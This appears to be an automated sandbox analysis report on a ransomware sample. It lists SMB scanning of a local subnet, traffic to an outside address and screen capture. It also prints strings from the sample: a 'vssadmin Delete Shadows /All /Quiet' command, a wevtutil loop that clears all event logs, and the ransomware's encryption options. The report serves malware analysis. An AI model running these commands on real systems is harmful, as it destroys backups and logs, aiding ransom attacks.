Source: global trafficTCP traffic: 192.168.2.200:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.209:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.214:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.215:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.212:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.213:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.218:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.219:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.216:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.217:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.210:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.211:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.0:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.180:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.181:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.184:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.185:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.182:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.183:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.188:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.189:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.186:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.187:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.191:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.192:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.190:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.195:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.196:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.193:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.194:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.199:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.197:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.198:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.168:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.169:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.162:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.163:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.160:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.161:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.166:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.167:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.164:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.165:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.170:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.179:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.173:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.174:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.171:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.172:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.177:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.178:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.175:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.176:445Jump to behavior
Source: 3PSo7GcHhV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: 3PSo7GcHhV.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\agent\_work\5\s\Release\Sdelete.pdb source: 3PSo7GcHhV.exe
Source: Binary string: C:\Users\m\Documents\tempver\ConsoleApp1\cppEnd\Release\cppEndWin32.pdb source: 3PSo7GcHhV.exe
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E64900 FindFirstFileW,FindFirstFileW,FindClose,15_2_00E64900
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E64AE0 FindFirstFileW,FindNextFileW,GetLastError,FindClose,GetLastError,__Mtx_unlock,__Mtx_unlock,__Mtx_unlock,__Mtx_unlock,GetVolumeNameForVolumeMountPointW,GetCurrentThread,SetThreadPriority,__Init_thread_footer,__Init_thread_footer,15_2_00E64AE0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E665E0 Sleep,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_unlock,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,FindFirstFileW,FindNextFileW,GetLastError,GetLastError,FindClose,__Mtx_unlock,__Mtx_unlock,GetCurrentThreadId,15_2_00E665E0
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.175.230
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6DE30 socket,inet_addr,htons,connect,setsockopt,setsockopt,send,send,send,send,send,recv,closesocket,closesocket,0_2_00E6DE30
Source: svchost.exe, 00000012.00000002.472211830.000001A90904C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000012.00000002.472211830.000001A90904C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000012.00000002.472211830.000001A90904C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.dmtf.
Source: svchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: svchost.exe, 00000012.00000002.471911461.000001A908F60000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
Source: svchost.exe, 00000018.00000002.309053653.0000026BA5213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000015.00000002.467893507.00000247C262A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000015.00000002.467893507.00000247C262A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000018.00000002.309109550.0000026BA5255000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000018.00000003.308895238.0000026BA5241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000018.00000003.308895238.0000026BA5241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000018.00000002.309120481.0000026BA5264000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000018.00000003.287137774.0000026BA5231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000018.00000002.309053653.0000026BA5213000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000018.00000003.308890946.0000026BA5245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000018.00000003.308890946.0000026BA5245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000018.00000003.287137774.0000026BA5231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000018.00000002.309086963.0000026BA523A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000018.00000002.309109550.0000026BA5255000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 3PSo7GcHhV.exeString found in binary or memory: https://www.sysinternals.com0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6E2D0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,GdipCreateBitmapFromHBITMAP,GdipGetImageHeight,GdipGetImageWidth,GdipBitmapGetPixel,CreateStreamOnHGlobal,CLSIDFromString,GdipSaveImageToStream,GdipDisposeImage,GetHGlobalFromStream,GlobalSize,GlobalLock,GlobalUnlock,DeleteObject,Sleep,GdipDisposeImage,0_2_00E6E2D0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Deletes shadow drive data (may be related to ransomware)Show sources
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /QuietJump to behavior
Source: 3PSo7GcHhV.exe, 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmpBinary or memory string: EulaAccepted:\\?\\\\.\msvsc.dllnetframwork.dllmscore.dlltwin.dllCulture.dll--------------------------------chacha failed, please run x86 versionSeDebugPrivilegeSeRestorePrivilegeSeBackupPrivilegeSeTakeOwnershipPrivilegeSeAuditPrivilegeSeSecurityPrivilegeSeIncreaseBasePriorityPrivilege\pos.txt\programdata\dat\runs.txt\hdscan't genrate id , possible reason is your av is manipalting , disblae and retry\tsconfig.txtwaitfornetworkwill wait for network to end for renamingnonetworkdisbaled network en-ingemailafternamewill put your email address at the end of file namerenameeachfilewill rename each file after encrypted noshutdownwont shutdown machine after encryption networkonlyprintadminsnomountslogswill log encrypted filesnoharddiskdisabled local resources en-ingnobsoddisabled bsocpup=abovenormalsetting cpu pririty to above normallcpup=belownormalsetting cpu pririty to below normalliop=setting io priority to buffer=buffer setted to threads=threads setted to skipmode= for files bigger than skiping mode enabled 1/networkfastmode=special skiping mode for network enabled 1/fastmode=networkusing same fasmode setting for both network and hardisk,specify "networkfastmode=X:Y" if you want special fastmode seetting for network resources will not encrypt admin networks shares, only print adminswill not encrypt mounted network shares\netrunning.txt\running.txtantoher process is already running, therminatingfor /F "tokens = *" %%G in ('wevtutil.exe el') DO (wevtutil.exe cl %%G)c:\windows\logg.bat/c c:\windows\logg.batc:\windows\system32\cmd.exeDelete Shadows /All /Quiet\Windows\system32\vssadmin.exeDeFaUlTID].id[,restarting as system
Source: vssadmin.exe, 00000006.00000002.219892677.0000024F93F25000.00000004.00000040.sdmpBinary or memory string: c:\Windows\system32\vssadmin.exeDeleteShadows/All/Quiet
Source: vssadmin.exe, 00000006.00000002.219820197.0000024F93D00000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000006.00000002.219820197.0000024F93D00000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000006.00000002.219820197.0000024F93D00000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000006.00000002.219820197.0000024F93D00000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000006.00000002.219820197.0000024F93D00000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000006.00000002.219832687.0000024F93D60000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\c:\Windows\system32\vssadmin.exe"c:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quietc:\Windows\system32\vssadmin.exeWinsta0\Default
Source: vssadmin.exe, 00000006.00000002.219832687.0000024F93D60000.00000004.00000020.sdmpBinary or memory string: "c:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
Source: 3PSo7GcHhV.exe, 0000000F.00000000.239808023.0000000000ECD000.00000002.00020000.sdmpBinary or memory string: EulaAccepted:\\?\\\\.\msvsc.dllnetframwork.dllmscore.dlltwin.dllCulture.dll--------------------------------chacha failed, please run x86 versionSeDebugPrivilegeSeRestorePrivilegeSeBackupPrivilegeSeTakeOwnershipPrivilegeSeAuditPrivilegeSeSecurityPrivilegeSeIncreaseBasePriorityPrivilege\pos.txt\programdata\dat\runs.txt\hdscan't genrate id , possible reason is your av is manipalting , disblae and retry\tsconfig.txtwaitfornetworkwill wait for network to end for renamingnonetworkdisbaled network en-ingemailafternamewill put your email address at the end of file namerenameeachfilewill rename each file after encrypted noshutdownwont shutdown machine after encryption networkonlyprintadminsnomountslogswill log encrypted filesnoharddiskdisabled local resources en-ingnobsoddisabled bsocpup=abovenormalsetting cpu pririty to above normallcpup=belownormalsetting cpu pririty to below normalliop=setting io priority to buffer=buffer setted to threads=threads setted to skipmode= for files bigger than skiping mode enabled 1/networkfastmode=special skiping mode for network enabled 1/fastmode=networkusing same fasmode setting for both network and hardisk,specify "networkfastmode=X:Y" if you want special fastmode seetting for network resources will not encrypt admin networks shares, only print adminswill not encrypt mounted network shares\netrunning.txt\running.txtantoher process is already running, therminatingfor /F "tokens = *" %%G in ('wevtutil.exe el') DO (wevtutil.exe cl %%G)c:\windows\logg.bat/c c:\windows\logg.batc:\windows\system32\cmd.exeDelete Shadows /All /Quiet\Windows\system32\vssadmin.exeDeFaUlTID].id[,restarting as system
Source: 3PSo7GcHhV.exeBinary or memory string: EulaAccepted:\\?\\\\.\msvsc.dllnetframwork.dllmscore.dlltwin.dllCulture.dll--------------------------------chacha failed, please run x86 versionSeDebugPrivilegeSeRestorePrivilegeSeBackupPrivilegeSeTakeOwnershipPrivilegeSeAuditPrivilegeSeSecurityPrivilegeSeIncreaseBasePriorityPrivilege\pos.txt\programdata\dat\runs.txt\hdscan't genrate id , possible reason is your av is manipalting , disblae and retry\tsconfig.txtwaitfornetworkwill wait for network to end for renamingnonetworkdisbaled network en-ingemailafternamewill put your email address at the end of file namerenameeachfilewill rename each file after encrypted noshutdownwont shutdown machine after encryption networkonlyprintadminsnomountslogswill log encrypted filesnoharddiskdisabled local resources en-ingnobsoddisabled bsocpup=abovenormalsetting cpu pririty to above normallcpup=belownormalsetting cpu pririty to below normalliop=setting io priority to buffer=buffer setted to threads=threads setted to skipmode= for files bigger than skiping mode enabled 1/networkfastmode=special skiping mode for network enabled 1/fastmode=networkusing same fasmode setting for both network and hardisk,specify "networkfastmode=X:Y" if you want special fastmode seetting for network resources will not encrypt admin networks shares, only print adminswill not encrypt mounted network shares\netrunning.txt\running.txtantoher process is already running, therminatingfor /F "tokens = *" %%G in ('wevtutil.exe el') DO (wevtutil.exe cl %%G)c:\windows\logg.bat/c c:\windows\logg.batc:\windows\system32\cmd.exeDelete Shadows /All /Quiet\Windows\system32\vssadmin.exeDeFaUlTID].id[,restarting as system
May disable shadow drive data (uses vssadmin)Show sources
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /QuietJump to behavior

Operating System Destruction:

barindex
Protects its processes via BreakOnTermination flagShow sources
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess information set: 00 00 00 00 Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess information set: 00 00 00 00 Jump to behavior

System Summary:

barindex
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E63460 Sleep,CreateFileW,GetFileSize,CloseHandle,ReadFile,GetCurrentProcess,SetPriorityClass,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,CloseHandle,DeleteFileW,Sleep,Concurrency::cancel_current_task,0_2_00E63460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E86E30 NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,0_2_00E86E30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E83F10 CreateFileA,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,DeleteFileA,CloseHandle,DeleteFileA,0_2_00E83F10
